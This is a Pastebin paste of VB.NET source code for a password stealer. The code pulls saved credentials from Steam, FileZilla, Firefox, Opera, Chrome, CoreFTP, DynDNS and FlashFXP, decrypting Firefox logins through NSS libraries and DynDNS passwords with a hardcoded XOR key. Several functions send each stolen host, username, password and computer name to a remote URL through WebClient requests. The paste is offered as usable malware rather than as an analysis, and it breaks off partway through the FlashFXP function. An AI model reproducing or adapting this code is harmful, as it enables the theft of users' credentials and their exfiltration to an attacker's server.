Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- vb.net password stealer source(re-upload)
- 'Steam username Stealer
- Public Shared Function GetSteamUsername() As Object
- Dim obj2 As Object
- Dim num2 As Integer
- Try
- Dim num3 As Integer
- Label_0000:
- ProjectData.ClearProjectError
- Dim num As Integer = 1
- Label_0008:
- num3 = 2
- Dim str2 As String = Conversions.ToString(MyProject.Computer.Registry.GetValue("HKEY_CURRENT_USER\SOFTWARE\Valve\Steam", "SteamPath", ""))
- Label_002F:
- num3 = 3
- Dim file As String = (str2 & "\config\SteamAppData.vdf")
- Label_003E:
- num3 = 4
- Dim strArray As String() = MyProject.Computer.FileSystem.ReadAllText(file).Split(New Char() { """"c })
- Label_0067:
- num3 = 5
- If (strArray(9) = "") Then
- goto Label_0099
- End If
- Label_007C:
- num3 = 6
- strArray(9) = strArray(9)
- Label_0087:
- num3 = 7
- obj2 = strArray(9)
- goto Label_0131
- Label_0099:
- num3 = 9
- Label_009D:
- num3 = 10
- obj2 = Nothing
- goto Label_0131
- Label_00AD:
- num2 = 0
- Select Case (num2 + 1)
- Case 1
- goto Label_0000
- Case 2
- goto Label_0008
- Case 3
- goto Label_002F
- Case 4
- goto Label_003E
- Case 5
- goto Label_0067
- Case 6
- goto Label_007C
- Case 7
- goto Label_0087
- Case 8, 11, 12
- goto Label_0131
- Case 9
- goto Label_0099
- Case 10
- goto Label_009D
- Case Else
- goto Label_0126
- End Select
- Label_00EF:
- num2 = num3
- Select Case num
- Case 0
- goto Label_0126
- Case 1
- goto Label_00AD
- End Select
- Catch obj1 As Object When (?)
- ProjectData.SetProjectError(DirectCast(obj1, Exception))
- goto Label_00EF
- End Try
- Label_0126:
- Throw ProjectData.CreateProjectError(-2146828237)
- Label_0131:
- If (num2 <> 0) Then
- ProjectData.ClearProjectError
- End If
- Return obj2
- End Function
- 'Filezilla Password Stealer
- Public Shared Function GetFZ() As String
- Dim document As New XmlDocument
- Dim left As Object = Nothing
- Dim str As String = ""
- Dim path As String = (Interaction.Environ("appdata") & "\FileZilla\recentservers.xml")
- If File.Exists(path) Then
- Try
- document.Load(path)
- Dim elementsByTagName As XmlNodeList = document.GetElementsByTagName("Host")
- Dim list As XmlNodeList = document.GetElementsByTagName("Port")
- Dim list2 As XmlNodeList = document.GetElementsByTagName("User")
- Dim list3 As XmlNodeList = document.GetElementsByTagName("Pass")
- Dim num2 As Integer = (elementsByTagName.Count - 1)
- Dim i As Integer = 0
- Do While (i <= num2)
- left = Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(left, "Application: FileZilla"), ChrW(13) & ChrW(10)), "Host: "), elementsByTagName.ItemOf(i).InnerText), ChrW(13) & ChrW(10)), "Port: "), list.ItemOf(i).InnerText), ChrW(13) & ChrW(10)), "Username: "), list2.ItemOf(i).InnerText), ChrW(13) & ChrW(10)), "Password: "), list3.ItemOf(i).InnerText), ChrW(13) & ChrW(10)), ChrW(13) & ChrW(10))
- New WebClient().DownloadString(String.Concat(New String() { QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.URL, "?action=add&a=15&u=", elementsByTagName.ItemOf(i).InnerText, "&l=", list2.ItemOf(i).InnerText, "&p=", list3.ItemOf(i).InnerText, "&c=", MyProject.Computer.Name.ToString }))
- i += 1
- Loop
- str = Conversions.ToString(left)
- Catch exception1 As Exception
- ProjectData.SetProjectError(exception1)
- ProjectData.ClearProjectError
- End Try
- End If
- Return str
- End Function
- 'Firefox Password Stealer
- Public Shared Sub GetFF()
- Dim str4 As String = Nothing
- Dim enumerator As IEnumerator
- Dim enumerator2 As IEnumerator
- Dim flag As Boolean = False
- Dim str2 As String = (Environment.GetFolderPath(SpecialFolder.ProgramFiles) & "\Mozilla Firefox\")
- Dim str5 As String
- For Each str5 In Directory.GetDirectories((Environment.GetFolderPath(SpecialFolder.ApplicationData) & "\Mozilla\Firefox\Profiles"))
- If flag Then
- Exit For
- End If
- Dim str6 As String
- For Each str6 In Directory.GetFiles(str5)
- If Not flag Then
- If Regex.IsMatch(str6, "signons.sqlite") Then
- QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.oivGmTktmoB(str5)
- QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.heria = str6
- End If
- Else
- ProjectData.EndApp
- Exit For
- End If
- Next
- Next
- Dim heria As String = QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.heria
- Dim item2 As New TSECItem
- Dim result As New TSECItem
- Dim item As New TSECItem
- Dim base2 As New Base(heria)
- Dim table As DataTable = base2.ExecuteQuery("SELECT * FROM moz_logins;")
- Dim table2 As DataTable = base2.ExecuteQuery("SELECT * FROM moz_disabledHosts;")
- Try
- enumerator = table2.Rows.GetEnumerator
- Do While enumerator.MoveNext
- Dim current As DataRow = DirectCast(enumerator.Current, DataRow)
- str4 = (str4 & Environment.NewLine & "hostname".ToString)
- Loop
- Finally
- If TypeOf enumerator Is IDisposable Then
- TryCast(enumerator,IDisposable).Dispose
- End If
- End Try
- QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.OMhwbbbdVrvk(QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.bvryeuuo, True, 0)
- Try
- enumerator2 = table.Rows.GetEnumerator
- Do While enumerator2.MoveNext
- Dim buffer2 As Byte()
- Dim row2 As DataRow = DirectCast(enumerator2.Current, DataRow)
- str4 = (str4 & Environment.NewLine & "Application: FireFox")
- Dim str7 As String = Convert.ToString(row2.Item("formSubmitURL").ToString)
- str4 = (str4 & Environment.NewLine & "URL: " & str7)
- Dim inStr As New StringBuilder(row2.Item("encryptedUsername").ToString)
- Dim num3 As Integer = QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.xSGTjizteYUcgxxr(IntPtr.Zero, IntPtr.Zero, inStr, inStr.Length)
- Dim ptr As New IntPtr(num3)
- Dim data As TSECItem = DirectCast(Marshal.PtrToStructure(ptr, GetType(TSECItem)), TSECItem)
- If ((QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.CqSzxpvjJWBHufugp(data, result, 0) = 0) AndAlso (result.SECItemLen <> 0)) Then
- buffer2 = New Byte(((result.SECItemLen - 1) + 1) - 1) {}
- ptr = New IntPtr(result.SECItemData)
- Marshal.Copy(ptr, buffer2, 0, result.SECItemLen)
- str4 = (str4 & Environment.NewLine & "Username: " & Encoding.ASCII.GetString(buffer2))
- End If
- Dim builder As New StringBuilder(row2.Item("encryptedPassword").ToString)
- Dim num2 As Integer = QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.xSGTjizteYUcgxxr(IntPtr.Zero, IntPtr.Zero, builder, builder.Length)
- ptr = New IntPtr(num2)
- Dim item5 As TSECItem = DirectCast(Marshal.PtrToStructure(ptr, GetType(TSECItem)), TSECItem)
- If ((QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.CqSzxpvjJWBHufugp(item5, item, 0) = 0) AndAlso (item.SECItemLen <> 0)) Then
- Dim destination As Byte() = New Byte(((item.SECItemLen - 1) + 1) - 1) {}
- ptr = New IntPtr(item.SECItemData)
- Marshal.Copy(ptr, destination, 0, item.SECItemLen)
- str4 = String.Concat(New String() { str4, Environment.NewLine, "Passwort: ", Encoding.ASCII.GetString(destination), Environment.NewLine })
- QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.FFString = str4
- New WebClient().DownloadString(String.Concat(New String() { QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.URL, "?action=add&a=10&u=", str7, "&l=", Encoding.ASCII.GetString(buffer2), "&p=", Encoding.ASCII.GetString(destination), "&c=", MyProject.Computer.Name.ToString }))
- End If
- Loop
- Finally
- If TypeOf enumerator2 Is IDisposable Then
- TryCast(enumerator2,IDisposable).Dispose
- End If
- End Try
- End Sub
- 'Opera Password Stealer
- Public Shared Function GetOperaa() As String
- Dim str As String
- Dim list As New List(Of String)
- Dim strArray As String() = DirectCast(QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.DecryptInfo, String())
- Dim builder As New StringBuilder
- Dim str2 As String
- For Each str2 In strArray
- If (str2 <> "") Then
- list.Add(str2)
- End If
- Next
- If (list.Count = 0) Then
- Return " " & ChrW(13) & ChrW(10)
- End If
- Try
- Dim num3 As Integer = (list.Count - 1)
- Dim i As Integer = 0
- Do While (i <= num3)
- builder.Append("Application: Opera" & ChrW(13) & ChrW(10))
- builder.Append(("Host: " & list.Item(i).Substring(0) & ChrW(13) & ChrW(10)))
- builder.Append(("User Name: " & list.Item((i + 1)).Substring(1) & ChrW(13) & ChrW(10)))
- builder.Append(("Password: " & list.Item((i + 2)).Substring(1) & ChrW(13) & ChrW(10) & ChrW(13) & ChrW(10)))
- Dim str3 As String = list.Item(i).Substring(1)
- Dim str5 As String = list.Item((i + 1)).Substring(1)
- Dim str4 As String = list.Item((i + 2)).Substring(1)
- New WebClient().DownloadString(String.Concat(New String() { QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.URL, "?action=add&a=13&u=", str3, "&l=", str5, "&p=", str4, "&c=", MyProject.Computer.Name.ToString }))
- i = (i + 3)
- Loop
- str = builder.ToString
- Catch exception1 As Exception
- ProjectData.SetProjectError(exception1)
- ProjectData.ClearProjectError
- End Try
- Return str
- End Function
- 'Google Chrome Password Stealer
- [php]
- Public Shared Function GetChrome() As Object
- Dim obj2 As Object
- Dim baseName As String = (Environment.GetFolderPath(SpecialFolder.LocalApplicationData) & "\Google\Chrome\User Data\Default\Login Data")
- Try
- Dim instance As Object = New SQLiteHandler(baseName)
- NewLateBinding.LateCall(instance, Nothing, "ReadTable", New Object() { "logins" }, Nothing, Nothing, Nothing, True)
- If Not File.Exists(baseName) Then
- Return obj2
- End If
- Dim num2 As Integer = Conversions.ToInteger(Operators.SubtractObject(NewLateBinding.LateGet(instance, Nothing, "GetRowCount", New Object(0 - 1) {}, Nothing, Nothing, Nothing), 1))
- Dim i As Integer = 0
- Do While (i <= num2)
- Dim arguments As Object() = New Object() { i, "origin_url" }
- Dim copyBack As Boolean() = New Boolean() { True, False }
- If copyBack(0) Then
- i = CInt(Conversions.ChangeType(RuntimeHelpers.GetObjectValue(arguments(0)), GetType(Integer)))
- End If
- Dim str5 As String = Conversions.ToString(NewLateBinding.LateGet(instance, Nothing, "GetValue", arguments, Nothing, Nothing, copyBack))
- Dim objArray As Object() = New Object() { i, "username_value" }
- copyBack = New Boolean() { True, False }
- If copyBack(0) Then
- i = CInt(Conversions.ChangeType(RuntimeHelpers.GetObjectValue(objArray(0)), GetType(Integer)))
- End If
- Dim str2 As String = Conversions.ToString(NewLateBinding.LateGet(instance, Nothing, "GetValue", objArray, Nothing, Nothing, copyBack))
- Dim objArray3 As Object() = New Object(1 - 1) {}
- Dim obj4 As Object = instance
- arguments = New Object(2 - 1) {}
- arguments(0) = i
- Dim str6 As String = "password_value"
- arguments(1) = str6
- objArray = arguments
- copyBack = New Boolean() { True, False }
- If copyBack(0) Then
- i = CInt(Conversions.ChangeType(RuntimeHelpers.GetObjectValue(objArray(0)), GetType(Integer)))
- End If
- objArray3(0) = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(obj4, Nothing, "GetValue", objArray, Nothing, Nothing, copyBack))
- Dim objArray4 As Object() = objArray3
- Dim flagArray2 As Boolean() = New Boolean() { True }
- If flagArray2(0) Then
- NewLateBinding.LateSetComplex(obj4, Nothing, "GetValue", New Object() { i, str6, RuntimeHelpers.GetObjectValue(objArray4(0)) }, Nothing, Nothing, True, False)
- End If
- Dim str4 As String = QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.Wegsada(DirectCast(NewLateBinding.LateGet(Encoding.Default, Nothing, "GetBytes", objArray4, Nothing, Nothing, flagArray2), Byte()))
- If ((str2 <> "") And (str4 <> "")) Then
- Dim item As String = String.Concat(New String() { "Application: Google Chrome" & ChrW(13) & ChrW(10) & "Host: ", str5, ChrW(13) & ChrW(10) & "Username: ", str2, ChrW(13) & ChrW(10) & "Password: ", str4, ChrW(13) & ChrW(10) })
- QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.ListBox1.Items.Add(item)
- New WebClient().DownloadString(String.Concat(New String() { QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.URL, "?action=add&a=12&u=", str5, "&l=", str2, "&p=", str4, "&c=", MyProject.Computer.Name.ToString }))
- End If
- i += 1
- Loop
- Catch exception1 As Exception
- ProjectData.SetProjectError(exception1)
- ProjectData.ClearProjectError
- End Try
- Return obj2
- End Function
- 'CoreFTP Password Stealer
- Module CoreFTP
- Function CoreFTP() As String
- Dim sPath As String = Environ$("APPDATA") & "\CoreFTP\sites.idx"
- Dim sFile As String = ReadFile(sPath)
- Dim sHost As String = RegRead("HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites\" & sFile & "\Host")
- Dim sPort As String = RegRead("HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites\" & sFile & "\Port")
- Dim sUser As String = RegRead("HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites\" & sFile & "\User")
- Dim sPwd As String = RegRead("HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites\" & sFile & "\PW")
- Dim sEntry As String = RegRead("HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites\" & sFile & "\Name")
- If Not sUser = "" Then
- Try
- CoreFTP = "Entry: " + sEntry + vbNewLine + "Host: " + sHost + ":" + sPort + vbNewLine + "User: " + sUser + vbNewLine + "Pwd: " + sPwd + " (Encrypt)"
- Dim nl As String = vbNewLine
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("============CoreFTP==============")
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("Entry: " & sEntry)
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("Host: " & sHost)
- Form1.ztext.AppendText(": " & sPort)
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("User: " & sUser)
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("Password: " & sPwd)
- Form1.ztext.AppendText("=============================")
- Form1.ztext.AppendText(nl)
- Catch ex As Exception
- Form1.ztext.AppendText("============CoreFTP==============")
- Form1.ztext.AppendText(vbNewLine)
- Form1.ztext.AppendText("CoreFTP Couldn't Be Recovered!")
- Form1.ztext.AppendText(vbNewLine)
- Form1.ztext.AppendText("=================================")
- End Try
- Else
- End If
- End Function
- End Module
- 'DYN DNS Password Stealer
- Module Dyndns
- Public Function GoogleDns() As String
- On Error Resume Next
- GoogleDns = Nothing
- Dim sAppData As String
- Dim sPath As String
- Dim sLine As String
- Dim sUser As String = Nothing
- Dim sPassword As String = Nothing
- Dim i As Integer
- Dim sChars As String = Nothing
- Dim lPtr As Integer
- sAppData = Environ("ALLUSERSPROFILE")
- If Right(sAppData, 1) <> "\" Then sAppData = sAppData & "\"
- sPath = sAppData & "DynDNS\Updater\config.dyndns"
- 'UPGRADE_WARNING: Dir has a new behavior. Click for more: 'ms-help://MS.VSCC.v90/dv_commoner/local/redirect.htm?keyword="9B7D5ADD-D8FE-4819-A36C-6DEDAF088CC7"'
- If Dir(sPath) <> "" Then
- FileOpen(1, sPath, OpenMode.Binary)
- Do While Not EOF(1)
- sLine = vbNullString
- sLine = LineInput(1)
- If Left(sLine, 9) = "Username=" Then sUser = Mid(sLine, 10)
- If Left(sLine, 9) = "Password=" Then
- sPassword = Mid(sLine, 10)
- 'We have what we want, now exit do
- Exit Do
- End If
- Loop
- FileClose(1)
- For i = 1 To Len(sPassword) Step 2
- sChars = sChars & Chr(Val("&H" & Mid(sPassword, i, 2)))
- Next i
- For i = 1 To Len(sChars)
- Mid(sChars, i, 1) = Chr((Asc(Mid(sChars, i, 1))) Xor (Asc(Mid("t6KzXhCh", lPtr + 1, 1))))
- lPtr = ((lPtr + 1) Mod 8)
- Next i
- Dim nl As String = vbNewLine
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("============DYNDNS==============")
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("Username: " & sUser)
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("Password: " & sChars)
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("=============================")
- Form1.ztext.AppendText(nl)
- If sUser = "" Or sChars = "" Then
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("============DYNDNS==============")
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("DYNDNS Couldn't Be Recovered!")
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("=============================")
- Form1.ztext.AppendText(nl)
- End If
- End If
- End Function
- End Module
- 'FF1 Password Stealer
- Imports System
- Imports System.IO
- Imports System.Runtime.InteropServices
- Imports System.Data
- Imports FireFox.SQLiteWrapper
- Imports System.Text
- Module FFDecryptor
- Public Class SHITEMID
- Public Shared cb As Long
- Public Shared abID As Byte()
- End Class
- <StructLayout(LayoutKind.Sequential)> _
- Public Structure TSECItem
- Public SECItemType As Integer
- Public SECItemData As Integer
- Public SECItemLen As Integer
- End Structure
- <DllImport("kernel32.dll")> _
- Private Function LoadLibrary(ByVal dllFilePath As String) As IntPtr
- End Function
- Private NSS3 As IntPtr
- <DllImport("kernel32", CharSet:=CharSet.Ansi, ExactSpelling:=True, SetLastError:=True)> _
- Private Function GetProcAddress(ByVal hModule As IntPtr, ByVal procName As String) As IntPtr
- End Function
- <UnmanagedFunctionPointer(CallingConvention.Cdecl)> _
- Public Delegate Function DLLFunctionDelegate(ByVal configdir As String) As Long
- Public Function NSS_Init(ByVal configdir As String) As Long
- Dim MozillaPath As String = Environment.GetEnvironmentVariable("PROGRAMFILES") & "\Mozilla Firefox\"
- LoadLibrary(MozillaPath & "mozcrt19.dll")
- LoadLibrary(MozillaPath & "nspr4.dll")
- LoadLibrary(MozillaPath & "plc4.dll")
- LoadLibrary(MozillaPath & "plds4.dll")
- LoadLibrary(MozillaPath & "ssutil3.dll")
- LoadLibrary(MozillaPath & "sqlite3.dll")
- LoadLibrary(MozillaPath & "nssutil3.dll")
- LoadLibrary(MozillaPath & "softokn3.dll")
- NSS3 = LoadLibrary(MozillaPath & "nss3.dll")
- Dim pProc As IntPtr = GetProcAddress(NSS3, "NSS_Init")
- Dim dll As DLLFunctionDelegate = DirectCast(Marshal.GetDelegateForFunctionPointer(pProc, GetType(DLLFunctionDelegate)), DLLFunctionDelegate)
- Return dll(configdir)
- End Function
- <UnmanagedFunctionPointer(CallingConvention.Cdecl)> _
- Public Delegate Function DLLFunctionDelegate2() As Long
- Public Function PK11_GetInternalKeySlot() As Long
- Dim pProc As IntPtr = GetProcAddress(NSS3, "PK11_GetInternalKeySlot")
- Dim dll As DLLFunctionDelegate2 = DirectCast(Marshal.GetDelegateForFunctionPointer(pProc, GetType(DLLFunctionDelegate2)), DLLFunctionDelegate2)
- Return dll()
- End Function
- <UnmanagedFunctionPointer(CallingConvention.Cdecl)> _
- Public Delegate Function DLLFunctionDelegate3(ByVal slot As Long, ByVal loadCerts As Boolean, ByVal wincx As Long) As Long
- Public Function PK11_Authenticate(ByVal slot As Long, ByVal loadCerts As Boolean, ByVal wincx As Long) As Long
- Dim pProc As IntPtr = GetProcAddress(NSS3, "PK11_Authenticate")
- Dim dll As DLLFunctionDelegate3 = DirectCast(Marshal.GetDelegateForFunctionPointer(pProc, GetType(DLLFunctionDelegate3)), DLLFunctionDelegate3)
- Return dll(slot, loadCerts, wincx)
- End Function
- <UnmanagedFunctionPointer(CallingConvention.Cdecl)> _
- Public Delegate Function DLLFunctionDelegate4(ByVal arenaOpt As IntPtr, ByVal outItemOpt As IntPtr, ByVal inStr As StringBuilder, ByVal inLen As Integer) As Integer
- Public Function NSSBase64_DecodeBuffer(ByVal arenaOpt As IntPtr, ByVal outItemOpt As IntPtr, ByVal inStr As StringBuilder, ByVal inLen As Integer) As Integer
- Dim pProc As IntPtr = GetProcAddress(NSS3, "NSSBase64_DecodeBuffer")
- Dim dll As DLLFunctionDelegate4 = DirectCast(Marshal.GetDelegateForFunctionPointer(pProc, GetType(DLLFunctionDelegate4)), DLLFunctionDelegate4)
- Return dll(arenaOpt, outItemOpt, inStr, inLen)
- End Function
- <UnmanagedFunctionPointer(CallingConvention.Cdecl)> _
- Public Delegate Function DLLFunctionDelegate5(ByRef data As TSECItem, ByRef result As TSECItem, ByVal cx As Integer) As Integer
- Public Function PK11SDR_Decrypt(ByRef data As TSECItem, ByRef result As TSECItem, ByVal cx As Integer) As Integer
- Dim pProc As IntPtr = GetProcAddress(NSS3, "PK11SDR_Decrypt")
- Dim dll As DLLFunctionDelegate5 = DirectCast(Marshal.GetDelegateForFunctionPointer(pProc, GetType(DLLFunctionDelegate5)), DLLFunctionDelegate5)
- Return dll(data, result, cx)
- End Function
- Public signon As String
- End Module
- 'FF2 Password Stealer
- Imports System
- Imports System.Collections.Generic
- Imports System.Text
- Imports System.Runtime.InteropServices
- Imports System.Data
- Imports System.Collections
- Namespace SQLiteWrapper
- Public Class SQLiteBase
- <DllImport("kernel32")> _
- Private Shared Function HeapAlloc(ByVal heap As IntPtr, ByVal flags As UInt32, ByVal bytes As UInt32) As IntPtr
- End Function
- <DllImport("kernel32")> _
- Private Shared Function GetProcessHeap() As IntPtr
- End Function
- <DllImport("kernel32")> _
- Private Shared Function lstrlen(ByVal str As IntPtr) As Integer
- End Function
- <DllImport("sqlite3")> _
- Private Shared Function sqlite3_open(ByVal fileName As IntPtr, ByRef database As IntPtr) As Integer
- End Function
- <DllImport("sqlite3")> _
- Private Shared Function sqlite3_close(ByVal database As IntPtr) As Integer
- End Function
- <DllImport("sqlite3")> _
- Private Shared Function sqlite3_exec(ByVal database As IntPtr, ByVal query As IntPtr, ByVal callback As IntPtr, ByVal arguments As IntPtr, ByRef [error] As IntPtr) As Integer
- End Function
- <DllImport("sqlite3")> _
- Private Shared Function sqlite3_errmsg(ByVal database As IntPtr) As IntPtr
- End Function
- <DllImport("sqlite3")> _
- Private Shared Function sqlite3_prepare_v2(ByVal database As IntPtr, ByVal query As IntPtr, ByVal length As Integer, ByRef statement As IntPtr, ByRef tail As IntPtr) As Integer
- End Function
- <DllImport("sqlite3")> _
- Private Shared Function sqlite3_step(ByVal statement As IntPtr) As Integer
- End Function
- <DllImport("sqlite3")> _
- Private Shared Function sqlite3_column_count(ByVal statement As IntPtr) As Integer
- End Function
- <DllImport("sqlite3")> _
- Private Shared Function sqlite3_column_name(ByVal statement As IntPtr, ByVal columnNumber As Integer) As IntPtr
- End Function
- <DllImport("sqlite3")> _
- Private Shared Function sqlite3_column_type(ByVal statement As IntPtr, ByVal columnNumber As Integer) As Integer
- End Function
- <DllImport("sqlite3")> _
- Private Shared Function sqlite3_column_int(ByVal statement As IntPtr, ByVal columnNumber As Integer) As Integer
- End Function
- <DllImport("sqlite3")> _
- Private Shared Function sqlite3_column_double(ByVal statement As IntPtr, ByVal columnNumber As Integer) As Double
- End Function
- <DllImport("sqlite3")> _
- Private Shared Function sqlite3_column_text(ByVal statement As IntPtr, ByVal columnNumber As Integer) As IntPtr
- End Function
- <DllImport("sqlite3")> _
- Private Shared Function sqlite3_column_blob(ByVal statement As IntPtr, ByVal columnNumber As Integer) As IntPtr
- End Function
- <DllImport("sqlite3")> _
- Private Shared Function sqlite3_column_table_name(ByVal statement As IntPtr, ByVal columnNumber As Integer) As IntPtr
- End Function
- <DllImport("sqlite3")> _
- Private Shared Function sqlite3_finalize(ByVal handle As IntPtr) As Integer
- End Function
- ' SQLite constants
- Private Const SQL_OK As Integer = 0
- Private Const SQL_ROW As Integer = 100
- Private Const SQL_DONE As Integer = 101
- Public Enum SQLiteDataTypes
- INT = 1
- FLOAT
- TEXT
- BLOB
- NULL
- End Enum
- Private database As IntPtr
- Public Sub New()
- database = IntPtr.Zero
- End Sub
- Public Sub New(ByVal baseName As [String])
- OpenDatabase(baseName)
- End Sub
- Public Sub OpenDatabase(ByVal baseName As [String])
- If sqlite3_open(StringToPointer(baseName), database) <> SQL_OK Then
- database = IntPtr.Zero
- Throw New Exception("Error with opening database " & baseName & "!")
- End If
- End Sub
- Public Sub CloseDatabase()
- If database <> IntPtr.Zero Then
- sqlite3_close(database)
- End If
- End Sub
- Public Function GetTables() As ArrayList
- Dim query As [String] = "SELECT name FROM sqlite_master " & "WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%'" & "UNION ALL " & "SELECT name FROM sqlite_temp_master " & "WHERE type IN ('table','view') " & "ORDER BY 1"
- Dim table As DataTable = ExecuteQuery(query)
- Dim list As New ArrayList()
- For Each row As DataRow In table.Rows
- list.Add(row.ItemArray(0).ToString())
- Next
- Return list
- End Function
- Public Sub ExecuteNonQuery(ByVal query As [String])
- Dim [error] As IntPtr
- sqlite3_exec(database, StringToPointer(query), IntPtr.Zero, IntPtr.Zero, [error])
- If [error] <> IntPtr.Zero Then
- Throw New Exception(("Error with executing non-query: """ & query & """!" & vbLf) + PointerToString(sqlite3_errmsg([error])))
- End If
- End Sub
- Public Function ExecuteQuery(ByVal query As [String]) As DataTable
- Dim statement As IntPtr
- Dim excessData As IntPtr
- sqlite3_prepare_v2(database, StringToPointer(query), GetPointerLenght(StringToPointer(query)), statement, excessData)
- Dim table As New DataTable()
- Dim result As Integer = ReadFirstRow(statement, table)
- While result = SQL_ROW
- result = ReadNextRow(statement, table)
- End While
- sqlite3_finalize(statement)
- Return table
- End Function
- Private Function ReadFirstRow(ByVal statement As IntPtr, ByRef table As DataTable) As Integer
- table = New DataTable("resultTable")
- Dim resultType As Integer = sqlite3_step(statement)
- If resultType = SQL_ROW Then
- Dim columnCount As Integer = sqlite3_column_count(statement)
- Dim columnName As [String] = ""
- Dim columnType As Integer = 0
- Dim columnValues As Object() = New Object(columnCount - 1) {}
- For i As Integer = 0 To columnCount - 1
- columnName = PointerToString(sqlite3_column_name(statement, i))
- columnType = sqlite3_column_type(statement, i)
- Select Case columnType
- Case CInt(SQLiteDataTypes.INT)
- If True Then
- table.Columns.Add(columnName, Type.[GetType]("System.Int32"))
- columnValues(i) = sqlite3_column_int(statement, i)
- Exit Select
- End If
- Case CInt(SQLiteDataTypes.FLOAT)
- If True Then
- table.Columns.Add(columnName, Type.[GetType]("System.Single"))
- columnValues(i) = sqlite3_column_double(statement, i)
- Exit Select
- End If
- Case CInt(SQLiteDataTypes.TEXT)
- If True Then
- table.Columns.Add(columnName, Type.[GetType]("System.String"))
- columnValues(i) = PointerToString(sqlite3_column_text(statement, i))
- Exit Select
- End If
- Case CInt(SQLiteDataTypes.BLOB)
- If True Then
- table.Columns.Add(columnName, Type.[GetType]("System.String"))
- columnValues(i) = PointerToString(sqlite3_column_blob(statement, i))
- Exit Select
- End If
- Case Else
- If True Then
- table.Columns.Add(columnName, Type.[GetType]("System.String"))
- columnValues(i) = ""
- Exit Select
- End If
- End Select
- Next
- table.Rows.Add(columnValues)
- End If
- Return sqlite3_step(statement)
- End Function
- Private Function ReadNextRow(ByVal statement As IntPtr, ByRef table As DataTable) As Integer
- Dim columnCount As Integer = sqlite3_column_count(statement)
- Dim columnType As Integer = 0
- Dim columnValues As Object() = New Object(columnCount - 1) {}
- For i As Integer = 0 To columnCount - 1
- columnType = sqlite3_column_type(statement, i)
- Select Case columnType
- Case CInt(SQLiteDataTypes.INT)
- If True Then
- columnValues(i) = sqlite3_column_int(statement, i)
- Exit Select
- End If
- Case CInt(SQLiteDataTypes.FLOAT)
- If True Then
- columnValues(i) = sqlite3_column_double(statement, i)
- Exit Select
- End If
- Case CInt(SQLiteDataTypes.TEXT)
- If True Then
- columnValues(i) = PointerToString(sqlite3_column_text(statement, i))
- Exit Select
- End If
- Case CInt(SQLiteDataTypes.BLOB)
- If True Then
- columnValues(i) = PointerToString(sqlite3_column_blob(statement, i))
- Exit Select
- End If
- Case Else
- If True Then
- columnValues(i) = ""
- Exit Select
- End If
- End Select
- Next
- table.Rows.Add(columnValues)
- Return sqlite3_step(statement)
- End Function
- Private Function StringToPointer(ByVal str As [String]) As IntPtr
- If str Is Nothing Then
- Return IntPtr.Zero
- Else
- Dim encoding__1 As Encoding = Encoding.UTF8
- Dim bytes As [Byte]() = encoding__1.GetBytes(str)
- Dim length As UInteger = bytes.Length + 1
- Dim pointer As IntPtr = HeapAlloc(GetProcessHeap(), 0, DirectCast(length, UInt32))
- Marshal.Copy(bytes, 0, pointer, bytes.Length)
- Marshal.WriteByte(pointer, bytes.Length, 0)
- Return pointer
- End If
- End Function
- Private Function PointerToString(ByVal ptr As IntPtr) As [String]
- If ptr = IntPtr.Zero Then
- Return Nothing
- End If
- Dim encoding__1 As Encoding = Encoding.UTF8
- Dim length As Integer = GetPointerLenght(ptr)
- Dim bytes As [Byte]() = New [Byte](length - 1) {}
- Marshal.Copy(ptr, bytes, 0, length)
- Return encoding__1.GetString(bytes, 0, length)
- End Function
- Private Function GetPointerLenght(ByVal ptr As IntPtr) As Integer
- If ptr = IntPtr.Zero Then
- Return 0
- End If
- Return lstrlen(ptr)
- End Function
- End Class
- End Namespace
- 'FlashFXP Stealer function
- Module FlashFXP
- Function FlashFXP() As String
- Dim sPath As String = Replace(Environ$("APPDATA"), Environ$("Username"), "All Users") & "\FlashFXP\" & "3" & "\quick.dat"
- Dim sFile As String = ReadFile(sPath)
- Dim sHost As String = Cut(sFile, "IP=", vbNewLine)
- Dim sPort As String = Cut(sFile, "port=", vbNewLine)
